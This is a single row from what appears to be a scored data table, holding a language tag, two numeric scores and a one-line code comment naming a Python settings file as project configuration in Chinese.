| en | 0.411205 | # settings.py: 项目配置 | 1.901587 | 2 |